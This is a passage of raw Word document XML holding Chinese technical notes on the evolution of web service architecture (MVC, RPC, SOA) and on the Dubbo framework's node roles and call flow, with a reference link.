          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(MVC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是关键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>分布式服务架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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当垂直应用越来越多，应用之间交互不可避免，将核心业务抽取出来，作为独立的服务，逐渐形成稳定的服务中心，使前端应用能更快速的响应多变的市场需求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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此时，用于提高业务复用及整合的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>分布式服务框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(RPC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是关键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>流动计算架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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当服务越来越多，容量的评估，小服务资源的浪费等问题逐渐显现，此时需增加一个调度中心基于访问压力实时管理集群容量，提高集群利用率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="009B79C9" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>此时，用于提高机器利用率的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>资源调度和治理中心</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SOA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>是关键</w:t>
      </w:r>
      <w:r w:rsidR="00F6249E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00F6249E" w:rsidRPr="009B79C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SOA</w:t>
      </w:r>
      <w:r w:rsidR="00F6249E" w:rsidRPr="009B79C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidR="007C11C6" w:rsidRPr="009B79C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>面向服务的架构</w:t>
      </w:r>
      <w:r w:rsidR="007C11C6" w:rsidRPr="009B79C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SOA)</w:t>
      </w:r>
      <w:r w:rsidR="009B79C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="00E56C54" w:rsidP="00483319">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>.4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t>架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="260"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noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4286885" cy="2860040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="图片 3" descr="http://dubbo.io/dubbo-architecture.jpg-version=1&amp;modificationDate=13308928700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dubbo.io/dubbo-architecture.jpg-version=1&amp;modificationDate=1330892870000.jpg"/>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4286885" cy="2860040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>节点角色说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Provider:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>暴露服务的服务提供方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>调用远程服务的服务消费方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Registry:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务注册与发现的注册中心。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Monitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>统计服务的调用次调和调用时间的监控中心。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Container:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务运行容器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150" w:line="260"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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>调用关系说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">0. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务容器负责启动，加载，运行服务提供者。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务提供者在启动时，向注册中心注册自己提供的服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务消费者在启动时，向注册中心订阅自己所需的服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>注册中心返回服务提供者地址列表给消费者，如果有变更，注册中心将基于长连接推送变更数据给消费者。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务消费者，从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>提供者地址列表中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，基于软负载均衡算法，选一台提供者进行调用，如果调用失败，再选另一台调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="260"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 xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>服务消费者和提供者，在内存中累计调用次数和调用时间，定时每分钟发送一次统计数据到监控中心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="001F1E36" w:rsidP="00483319">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>.4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A2F10" w:rsidRPr="00F41A4C">
        <w:t>能干什么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId296" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/Javame/p/3632473.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A2F10" w:rsidRPr="00F41A4C" w:rsidRDefault="005A2F10" w:rsidP="005A2F10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
